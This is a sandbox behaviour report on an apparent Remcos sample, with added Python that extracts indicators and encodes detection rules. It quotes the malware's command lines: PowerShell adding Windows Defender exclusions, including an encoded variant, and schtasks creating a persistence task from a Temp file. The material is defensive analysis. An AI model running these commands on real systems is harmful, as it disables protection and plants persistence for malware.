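The rows in this report are flattened table cells: the Source cell, the detail cell and the "Jump to behavior" link text were glued together during extraction. The Python below is an added example, not part of the Joe Sandbox report, that splits such rows back into source, label and value and derives host IOCs from them: mutex names (with conhost's WilError_03 entries and the NULL entry filtered out as noise), dropped files, scheduled task names, task XML files written under a Temp directory, and Defender exclusion paths. The sample rows are copied from this report; the Rmc- prefix check reflects the mutex naming commonly reported for Remcos builds and is an assumption of the example, not a statement the report makes.

```python
"""Split flattened Joe Sandbox signature rows and derive host IOCs from them."""
import re

# Labels that open the detail cell. Extraction glued the Source cell to it, so
# the earliest label found in a row marks the cell boundary.
DETAIL_LABELS = (
    "Matched rule:", "Static PE information:", "Static file information:",
    "Security API names:", "Classification label:", "Code function:",
    "File created:", "File read:", "Mutant created:", "Key opened:",
    "Process created:", "Section loaded:", "ReversingLabs:",
)
LINK_RESIDUE = "Jump to behavior"          # trailing link text left by extraction

TASK_RE = re.compile(r'/TN\s+"([^"]+)"')
XML_RE = re.compile(r'/XML\s+"([^"]+)"')
EXCLUSION_RE = re.compile(r'Add-MpPreference\s+-ExclusionPath\s+"([^"]+)"')

# Constructed sample: rows copied from this report exactly as extraction left them.
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeFile created: C:\Users\user\AppData\Roaming\jdSldfVS.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3048:120:WilError_03
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeMutant created: NULL
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeMutant created: \Sessions\1\BaseNamedObjects\donmtwtGg
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-HKC0PV
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeFile created: C:\Users\user\AppData\Local\Temp\tmpAF95.tmpJump to behavior
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"
"""


def parse_row(line):
    """Return (source, label, value) for one glued row, or None if no label is found."""
    line = line.strip()
    if line.endswith(LINK_RESIDUE):
        line = line[: -len(LINK_RESIDUE)]
    if line.startswith("Source: "):
        line = line[len("Source: "):]
    hits = [(line.find(label), label) for label in DETAIL_LABELS if label in line]
    if not hits:
        return None
    pos, label = min(hits)
    return line[:pos], label.rstrip(":"), line[pos + len(label):].strip()


def _add(bucket, item):
    """Append without duplicates, keeping first-seen order."""
    if item not in bucket:
        bucket.append(item)


def extract_iocs(text):
    """Derive host IOCs from a block of report rows."""
    iocs = {
        "mutexes": [], "remcos_style_mutexes": [], "dropped_files": [],
        "scheduled_tasks": [], "task_xml_from_temp": [], "defender_exclusions": [],
    }
    for raw in text.splitlines():
        row = parse_row(raw)
        if row is None:
            continue
        _source, label, value = row
        if label == "Mutant created":
            name = value.rsplit("\\", 1)[-1]
            # conhost's WilError_03 mutants and the NULL entry are benign noise.
            if name == "NULL" or name.endswith("WilError_03"):
                continue
            _add(iocs["mutexes"], name)
            if name.startswith("Rmc-"):          # assumption: Remcos-style naming
                _add(iocs["remcos_style_mutexes"], name)
        elif label == "File created":
            _add(iocs["dropped_files"], value)
        elif label == "Process created":
            for task in TASK_RE.findall(value):
                _add(iocs["scheduled_tasks"], task)
            for xml in XML_RE.findall(value):
                if "\\temp\\" in xml.lower():
                    _add(iocs["task_xml_from_temp"], xml)
            for path in EXCLUSION_RE.findall(value):
                _add(iocs["defender_exclusions"], path)
    return iocs


if __name__ == "__main__":
    for key, items in extract_iocs(SAMPLE_ROWS).items():
        print(key, items)
```

Feed it the whole signature section rather than the eight rows embedded here and the same buckets fill up with every mutex, dropped file and task the report records; unknown labels are skipped rather than misparsed, so extending DETAIL_LABELS is the only change needed for other row types.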
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | File created: C:\Users\user\AppData\Local\Temp\tmpAF95.tmp
Source: HUED23EDE5UGRFQ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HUED23EDE5UGRFQ.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: HUED23EDE5UGRFQ.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | File read: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
Source: unknown | Process created: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\jdSldfVS.exe C:\Users\user\AppData\Roaming\jdSldfVS.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Process created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Process created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Process created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp"
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Process created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Process created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Process created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
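The process tree above shows three patterns worth alerting on independently of the Remcos YARA hits: powershell.exe adding Defender exclusions with Add-MpPreference, schtasks.exe importing a task definition from a file under AppData\Local\Temp, and both the sample and its dropped copy launching a second instance of their own image. The Python below is an added example, not part of the report, that encodes those three rules over Sysmon-style process-creation events (the ParentImage, Image and CommandLine field names are an assumption). The events are constructed from the command lines in the tree; the -EncodedCommand variant and the benign schtasks control event are constructed additions that do not appear in the report.

```python
"""Three process-creation detections for the tree above, run over constructed events."""
import base64
import re

TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
XML_ARG_RE = re.compile(r'/XML\s+"?([^"\s]+)"?', re.I)

# Paths taken from the report's process tree; field names are assumed Sysmon-style.
SAMPLE = r"C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\jdSldfVS.exe"
POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
# Constructed variant: the same cmdlet hidden behind -EncodedCommand (UTF-16LE base64).
ENCODED = base64.b64encode(
    ('Add-MpPreference -ExclusionPath "%s"' % DROPPED).encode("utf-16le")).decode()

EVENTS = [
    {"ParentImage": SAMPLE, "Image": POWERSHELL,
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"'},
    {"ParentImage": SAMPLE, "Image": POWERSHELL, "CommandLine": "powershell.exe -enc " + ENCODED},
    {"ParentImage": SAMPLE, "Image": SCHTASKS,
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" '
                    r'/XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"'},
    {"ParentImage": SAMPLE, "Image": SAMPLE, "CommandLine": '"%s"' % SAMPLE},
    {"ParentImage": DROPPED, "Image": DROPPED, "CommandLine": '"%s"' % DROPPED},
    # Constructed benign control: a task imported from a user's Documents folder.
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /Create /TN "Backup" /XML "C:\Users\admin\Documents\backup.xml"'},
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if absent."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:
        return ""


def rule_defender_exclusion(ev):
    """powershell.exe running Add-MpPreference with an -Exclusion* parameter, plain or encoded."""
    if not ev["Image"].lower().endswith("powershell.exe"):
        return False
    text = (ev["CommandLine"] + " " + decode_encoded_command(ev["CommandLine"])).lower()
    return "add-mppreference" in text and "-exclusion" in text


def rule_task_from_temp_xml(ev):
    """schtasks.exe /Create with its /XML definition read from a Temp directory."""
    cmd = ev["CommandLine"]
    if not ev["Image"].lower().endswith("schtasks.exe") or "/create" not in cmd.lower():
        return False
    return any(any(t in path.lower() for t in TEMP_DIRS) for path in XML_ARG_RE.findall(cmd))


def rule_self_spawn_user_path(ev):
    """Parent and child share an image under a user-writable path, the self-launch
    pattern the tree shows for both the sample and its dropped copy (heuristic)."""
    image = ev["Image"].lower()
    return image == ev["ParentImage"].lower() and any(p in image for p in USER_WRITABLE)


RULES = {
    "defender_exclusion_via_powershell": rule_defender_exclusion,
    "schtasks_create_from_temp_xml": rule_task_from_temp_xml,
    "self_spawn_from_user_writable_path": rule_self_spawn_user_path,
}


def evaluate(events):
    """Return (rule_name, image) for every event a rule fires on, in event order."""
    return [(name, ev["Image"]) for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, image in evaluate(EVENTS):
        print(name, image)
```

The self-spawn rule is deliberately scoped to user-writable paths: plenty of legitimate software under Program Files relaunches itself, whereas a binary in Desktop or AppData\Roaming spawning its own image, followed by a schtasks import and Defender exclusions from the same parent, is the sequence recorded here.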
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Section loaded: windowscodecs.dll
